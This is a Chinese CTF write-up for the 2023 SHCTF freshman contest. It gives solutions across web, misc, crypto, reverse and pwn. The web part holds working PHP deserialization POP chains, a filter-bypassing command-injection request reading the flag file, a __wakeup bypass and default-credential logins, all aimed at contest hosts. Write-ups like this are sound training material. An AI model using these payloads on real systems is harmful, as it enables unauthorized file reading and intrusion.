2023SHCTF联赛

Sc0fie1d included in category Wp

2023-11-25 2023-12-17 802 words 4 minutes

Contents

2023SHCTF联赛—工带第二届新生赛

作为组委会摆烂成员，

摸鱼水题出题人，

自己也稍微做了点

更详细的wp见官方wp：

https://mp.weixin.qq.com/s/9Q176LuKQAhw7TlNg9vk4A

WEB

[WEEK1]1zzphp

套路跟ctfshow web131差不多

1
2
3
4
5
6
7


import requests
url="http://112.6.51.212:31610/?num[]=a"
data={
  'c_ode':'very'*250000+'2023SHCTF'
}
r=requests.post(url,data=data)
print(r.text)

[WEEK1]ez_serialize

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


<?php
class A{
  public $var_1='php://filter/read=convert.base64-encode/resource=flag.php';
  public function _invoke(){
​    include($this->var_1);
  }
}
class B{
  public $q;
  public function _wakeup(){
​    $this->q=new A();
  }
}
class C
{
  public $var;
  public $z;
  public function _toString(){
  return $this->z= new D();
  }
}
class D{
  public $p;
  public function __get($key){
​    $function = $this->p = new A();
  }
}
$pop=new B();
$pop->q=new C();
$pop->q->z=new D();
$pop->q->z->p=new A();
echo urlencode(serialize($pop));

[WEEK1]babyRCE

bp发包

1
2
3
4
5
6
7
8
9


GET /?rce=ca\t${IFS}/fla? HTTP/1.1
Host: 112.6.51.212:31105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

[WEEK1]登录就给flag

1

admin/password

[WEEK1]飞机大战

右键查看源代码，查看JS代码

找到

解码得到flag

[WEEK1]ezphp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


POST /?code=?.*=${phpinfo()} HTTP/1.1
Host: 112.6.51.212:31240
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

pattern=.*

[WEEK2]serialize

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44


<?php
class misca{
  public $gao;
  public $fei;
  public $a;
  public function __get($key){
    $this->miaomiao();
    $this->gao=$this->fei;
    die($this->a);
  }
  public function miaomiao(){
    $this->a='Mikey Mouse~';
  }
}
class musca {
  public $ding;
  public $dong;
  public function __wakeup(){
    return $this->ding->dong;
  }
}
class milaoshu{
  public $v;
  public function __tostring(){
    echo"misca~musca~milaoshu~~~";
    include($this->v);
  }
}
function check($data){
  if(preg_match('/^O:\d+/',$data)){
    die("you should think harder!");
  }
  else return $data;
}
$MI = new misca();
$MU = new musca();
$MIL = new milaoshu();
$MIL -> v = 'php://filter/read=convert.base64-encode/resource=flag.php';
$MI -> a =&$MI -> gao;
$MI -> gao ='1';
$MI -> fei =$MIL;
$MU -> ding = $MI;
$MU -> dong = 'Arcueid';
echo serialize(array($MU));

[WEEK2]no_wake_up

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


<?php
class flag
{
  public $username = "admin";
  public $code = "php://filter/read=convert.base64-encode/resource=flag.php";
  public function _wakeup()
  {
​    $this->username = "admin";
  }
  public function __destruct()
  {
​    if ($this->username = "admin") {
​      include($this->code);
​    }
  }
}
$a= (serialize(new flag));
echo $a;

然后将payload中反序列化的成员数2改成比2大的数

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


GET /wakeup.php?try=O:4:"flag":3:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";} HTTP/1.1
Host: 112.6.51.212:30930
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.6.51.212:30930/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Base解码得到flag

[WEEK2]EasyCMS

进入url/admin/admin.php

查到taoCMS登录弱口令admin/tao

随后在文件管理处找到flag位置

[WEEK2]ez_ssti

（这个payload push不上去，只能上截图了）

[WEEK1]生成你的邀请函吧~

MISC

[WEEK1] 真的签到

扫码回复

[WEEK1]ez-misc

二进制转图片，扫码得到解压密码

然后

放到cyberchef里得到rockyou，使用rockyou字典进行爆破得到解压密码

得到

随后

[WEEK1]残缺的md5

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


import hashlib
m='KCLWG?K8M9O3?DE?84S9'
for i in range(26):
  t1 = m.replace('?',str(chr(65+i)),1)
  for j in range(26):
​    t2 = t1.replace('?',str(chr(65+j)),1)
​    for h in range(26):
​      t3 = t2.replace('?',str(chr(65+h)),1)
​      s = hashlib.md5(t3.encode('utf8')).hexdigest().upper()
​      if s[:4] == 'F0AF':
​        print(s) 

[WEEK1]message

[WEEK1]佛说：只能四天

先栅栏4再rot3然后base16解码，出flag

[WEEK1]迷雾重重

[WEEK1]可爱的派蒙捏

[WEEK1]请对我使用社工吧

图片上有QQ号，tg盒出是东营，知道中石大在东营有个校区，就出了

[WEEK1]签到题

[WEEK1]黑暗之歌

[WEEK1]Jaeger lover

steghide extract -sf Typhoon.jpg

密码是：Tri-Sun Horizon Gate

随后拿到了解压密码：.*+#1Ao/aeS

随后

K34-759183-191

[WEEK1]Steganography

将xqwed替换掉base64解出来12ercs…..909jk的点，得到解压密码，解压密码得到flag

[WEEK1]也许需要一些py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


import hashlib
def reverse_case(s):
  \# 逐个反转字符串中的大小写字母
  result = []
  for i in range(2 ** len(s)):
​    new_str = ''
​    for j in range(len(s)):
​      if (i >> j) & 1:
​        new_str += s[j].lower()
​      else:
​        new_str += s[j].upper()
​    result.append(new_str)
  return result
def calculate_md5(s):
  \# 计算字符串的md5值
  md5_hash = hashlib.md5()
  md5_hash.update(s.encode('utf-8'))
  return md5_hash.hexdigest()
def main():
  input_str = "pNg_and_Md5_SO_GreaT"
  target_md5 = "63e62fbce22f2757f99eb7da179551d2"
  variations = reverse_case(input_str)
  for var in variations:
​    md5 = calculate_md5(var)
​    print(f"{var}, MD5: {md5}")
​    if md5 == target_md5:
​      print(f"找到匹配的结果: {var}")
​      break
if __name__ == "__main__":
  main()

[WEEK1]电信诈骗

关键词，四行七列，vivo50

[WEEK3]尓纬玛

还是有点问题的，，，，把左侧区纠错，得到flag

[WEEK2]哈希猫

逐一解密应该能解出来，，，，懒得搓了

[WEEK2]表里的码

加粗填充为黑色，不加粗不填充，扫码得到flag

[WEEK2]可爱的洛琪希

首先，zip未加密

然后base64解码得到jpg图片，在图片的属性信息里面的到十六进制字符串，解码得到flag

维吉尼亚解密得到flag

[WEEK2]图片里的秘密

Binwalk得到另一张图

盲水印提取

[WEEK2]喜帖街

steghide extract -sf music.wav -p LeeTung

随后okk解码得到flag

[WEEK2]远在天边近在眼前

}\4\a\9\2\b\0\a\5\7\c\e\f__\T\H\G\l\R\I\a_\y\5\4\e_\Y\l\l\a\e\r_\s\I_\S\l\h\7{\g\a\l\f

Windows下显示不全，可以在Linux下查看

[WEEK2]奇怪的screenshot

根据文件描述和图片已知部分，可知为win的截图漏洞 https://github.com/frankthetank-music/Acropalypse-Multi-Tool?search=1利用工具修复得到完整图片，提取其中的文字进行百家姓解密得到flag

在线百家姓暗号转换 - 2048T在线工具站

CRYPTO

[WEEK1]really_ez_rsa

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


import gmpy2
from Crypto.Util.number import long_to_bytes
p=217873395548207236847876059475581824463
q=185617189161086060278518214521453878483
c=6170206647205994850964798055359827998224330552323068751708721001188295410644
e=65537
n=p*q
d= gmpy2.invert(e,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))

[WEEK1]凯撒大帝

[WEEK1]进制

[WEEK1]okk

https://www.splitbrain.org/services/ook

[WEEK1]熊斐特

[WEEK1]难言的遗憾

https://www.qqxiuzi.cn/bianma/dianbao.php

[WEEK1]小兔子可爱捏

密码是42

[WEEK1]Crypto_Checkin

[WEEK1]what is m

1
2
3
4
5
6


from Crypto.Util.number import bytes_to_long
from Crypto.Util.number import inverse,long_to_bytes
m = 7130439814057451252206961031070073581161360005074250134175813545291250484317873215316850120633657018292427636656594416171229024284761739178169667824242590880304270396813980988571810173170813
flag=long_to_bytes(m)
flag.decode()
print(flag)

[WEEK1]立正

但，，，最后没解出来

REVERSE

[WEEK1]ez_apk

Jeb，base62换表

[WEEK1]signin

[WEEK1]easy_re

Ida F5得到加密代码

跟进比对字符串

1
2
3
4
5
6


code = [0x66,0x0C6,0x16,0x76,0x0B7,0x45,0x27,0x97,0x0F5,0x47,0x3,0x0F5,0x37,0x3,0x0C6,0x67,0x33,0x0F5,0x47,0x86,0x56,0x0F5,0x26,0x96,0x0E6,0x16,0x27,0x97,0x0F5,0x7,0x27,0x3,0x26,0x0C6,0x33,0x0D6,0x0D7,0x1B]
flag=""
for i in code:
  decrypt = ((i<<4)&0xFF)|(i>>4)
  flag += chr(decrypt)
print(flag)

PWN

[WEEK1]hard nc

[WEEK1]nc